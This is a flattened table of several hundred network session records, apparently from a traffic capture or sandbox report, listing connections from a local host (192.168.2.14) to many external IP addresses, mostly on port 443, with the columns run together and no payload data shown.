                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12545192.168.2.1439854122.202.166.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12546192.168.2.1457800121.247.59.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12547192.168.2.1460432140.100.21.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12548192.168.2.1443408102.35.172.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12549192.168.2.1439900202.7.187.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12550192.168.2.144982632.24.218.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12551192.168.2.146086862.157.22.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12552192.168.2.1446428191.107.160.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12553192.168.2.1458386173.216.45.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12554192.168.2.144023051.21.91.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12555192.168.2.1449934190.251.203.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12556192.168.2.144260644.164.166.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12557192.168.2.143751849.149.230.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12558192.168.2.1445584221.191.106.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12559192.168.2.145547837.98.116.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12560192.168.2.145252436.157.186.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12561192.168.2.143384425.222.236.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12562192.168.2.14372981.169.160.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12563192.168.2.144021681.104.107.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12564192.168.2.144447083.144.253.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12565192.168.2.145379635.183.215.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12566192.168.2.143419062.150.119.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12567192.168.2.1435748100.193.227.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12568192.168.2.144029857.22.66.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12569192.168.2.1436140153.207.139.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12570192.168.2.144348017.204.41.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12571192.168.2.144223068.148.43.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12572192.168.2.145989432.69.4.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12573192.168.2.1450018164.52.30.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12574192.168.2.144917042.126.108.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12575192.168.2.1448954210.230.95.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12576192.168.2.1446392113.22.149.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12577192.168.2.146089489.243.222.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12578192.168.2.144918273.87.228.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12579192.168.2.1455032151.44.207.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12580192.168.2.145800044.53.17.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12581192.168.2.1449946113.113.138.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12582192.168.2.1450770145.3.76.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12583192.168.2.144295043.246.142.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12584192.168.2.144884418.163.37.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12585192.168.2.1450522176.168.182.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12586192.168.2.1433758150.222.113.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12587192.168.2.1444658172.137.29.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12588192.168.2.145887042.8.53.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12589192.168.2.144385882.232.229.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12590192.168.2.145666058.72.10.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12591192.168.2.1449170178.32.10.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12592192.168.2.1434962110.104.75.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12593192.168.2.1442464193.8.14.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12594192.168.2.1433674194.228.62.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12595192.168.2.1447582129.254.107.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12596192.168.2.14555882.59.94.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12597192.168.2.143350234.12.63.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12598192.168.2.1447938205.129.5.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12599192.168.2.1447032205.202.48.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12600192.168.2.1449564188.88.1.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12601192.168.2.144491467.206.6.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12602192.168.2.1456524144.239.92.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12603192.168.2.144413886.218.72.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12604192.168.2.14373664.92.126.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12605192.168.2.146034625.187.2.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12606192.168.2.1460886168.178.68.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12607192.168.2.1440536188.9.134.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12608192.168.2.144940699.21.100.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12609192.168.2.1436232209.66.28.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12610192.168.2.145814017.97.77.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12611192.168.2.1450556212.132.7.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12612192.168.2.1434744187.184.36.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12613192.168.2.1455192121.71.136.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12614192.168.2.1453152188.174.145.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12615192.168.2.1448528121.152.6.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12616192.168.2.1455122211.98.25.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12617192.168.2.144844896.180.96.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12618192.168.2.1441650174.107.66.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12619192.168.2.144403069.46.192.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12620192.168.2.144873890.230.80.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12621192.168.2.1439876209.56.165.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12622192.168.2.143523467.250.223.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12623192.168.2.14558808.157.24.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12624192.168.2.145537477.0.57.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12625192.168.2.1460618115.250.129.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12626192.168.2.1443802148.153.247.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12627192.168.2.1453316119.223.240.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12628192.168.2.1445608173.73.76.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12629192.168.2.144781067.185.133.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12630192.168.2.146012048.123.207.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12631192.168.2.1449160108.0.133.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12632192.168.2.1443114140.14.6.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12633192.168.2.1437122119.210.210.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12634192.168.2.1439006187.103.201.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12635192.168.2.1457240101.234.9.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12636192.168.2.145120673.201.240.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12637192.168.2.14390229.226.42.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12638192.168.2.1457692207.193.207.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12639192.168.2.144397076.116.242.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12640192.168.2.143451624.213.165.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12641192.168.2.145445617.41.105.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12642192.168.2.1458886124.111.18.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12643192.168.2.1448710100.196.196.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12644192.168.2.1456038197.181.214.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12645192.168.2.145467643.203.252.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12646192.168.2.1442970208.88.236.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12647192.168.2.1447706202.124.58.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12648192.168.2.144117250.211.136.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12649192.168.2.1433278190.98.166.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12650192.168.2.145653427.158.189.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12651192.168.2.1453394204.188.161.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12652192.168.2.14483564.176.143.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12653192.168.2.1449934204.191.175.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12654192.168.2.1445872110.0.191.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12655192.168.2.1442932113.204.50.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12656192.168.2.144894688.12.233.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12657192.168.2.1441096212.129.231.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12658192.168.2.144918436.228.170.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12659192.168.2.1440246158.144.185.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12660192.168.2.1435298142.95.139.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12661192.168.2.144754458.252.155.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12662192.168.2.1449532137.16.171.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12663192.168.2.1445332221.200.222.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12664192.168.2.1441736220.110.2.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12665192.168.2.1442942212.182.22.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12666192.168.2.143866248.213.1.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12667192.168.2.145671448.169.45.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12668192.168.2.1460192103.208.184.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12669192.168.2.144601095.246.42.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12670192.168.2.1453144160.145.22.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12671192.168.2.143546413.52.90.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12672192.168.2.1459350163.74.204.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12673192.168.2.1453902124.1.103.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12674192.168.2.1452852213.210.153.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12675192.168.2.144858024.250.210.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12676192.168.2.145146825.51.78.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12677192.168.2.1439856129.97.1.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12678192.168.2.145627871.110.173.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12679192.168.2.1437988202.40.113.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12680192.168.2.145429447.226.79.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12681192.168.2.1455688123.141.14.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12682192.168.2.1436310222.222.6.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12683192.168.2.144404234.49.82.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12684192.168.2.1434142193.98.71.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12685192.168.2.144421063.174.76.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12686192.168.2.143290247.105.36.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12687192.168.2.144483467.201.95.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12688192.168.2.144069477.26.122.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12689192.168.2.1433290203.4.52.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12690192.168.2.1454488208.170.154.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12691192.168.2.14429309.83.212.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12692192.168.2.1438758190.203.238.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12693192.168.2.1435290219.168.117.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12694192.168.2.1447562173.61.16.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12695192.168.2.144447023.242.104.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12696192.168.2.1451084129.183.29.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12697192.168.2.1458886177.60.37.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12698192.168.2.1434458209.87.204.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12699192.168.2.145864470.53.4.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12700192.168.2.14387868.13.41.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12701192.168.2.1459754183.80.251.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12702192.168.2.145722866.113.54.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12703192.168.2.144624265.165.16.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12704192.168.2.1449702167.36.66.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12705192.168.2.1444682147.57.149.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12706192.168.2.1434414223.70.71.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12707192.168.2.1436066176.32.249.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12708192.168.2.143881886.53.119.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12709192.168.2.1452546144.17.138.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12710192.168.2.1432796133.231.167.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12711192.168.2.1440364126.80.89.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12712192.168.2.1458958142.64.37.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12713192.168.2.145237689.107.137.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12714192.168.2.145346814.53.190.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12715192.168.2.1439856210.69.94.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12716192.168.2.144685486.192.70.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12717192.168.2.1434718193.86.33.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12718192.168.2.145181036.122.173.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12719192.168.2.144483092.216.100.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12720192.168.2.145231848.177.25.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12721192.168.2.1446634174.123.193.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12722192.168.2.143927696.175.219.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12723192.168.2.145741273.249.63.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12724192.168.2.1443260106.129.214.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12725192.168.2.145373251.5.255.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12726192.168.2.1434306141.242.138.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12727192.168.2.143904434.219.160.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12728192.168.2.1440480122.194.116.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12729192.168.2.1451260114.208.29.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12730192.168.2.1442600151.84.75.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12731192.168.2.14606964.20.126.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12732192.168.2.1438516200.96.168.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12733192.168.2.1432946166.191.82.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12734192.168.2.1433294153.143.171.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12735192.168.2.145949066.102.202.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12736192.168.2.1452990174.216.92.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12737192.168.2.144749262.215.199.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12738192.168.2.1445536175.21.181.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12739192.168.2.1456610143.147.69.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12740192.168.2.1448060177.138.204.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12741192.168.2.1457710149.82.146.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12742192.168.2.1459464175.24.134.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12743192.168.2.1435250109.163.125.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12744192.168.2.1460220126.173.86.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12745192.168.2.1446368158.56.238.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12746192.168.2.144565466.121.207.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12747192.168.2.144627895.52.103.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12748192.168.2.1437696218.204.87.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12749192.168.2.143559636.122.16.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12750192.168.2.1459174145.248.230.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12751192.168.2.1459884213.159.107.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12752192.168.2.1455246100.36.116.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12753192.168.2.1455314205.170.243.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12754192.168.2.1442524194.188.49.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12755192.168.2.1460584152.203.13.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12756192.168.2.144104892.252.237.90443
                                                        TimestampBytes transferredDirectionData


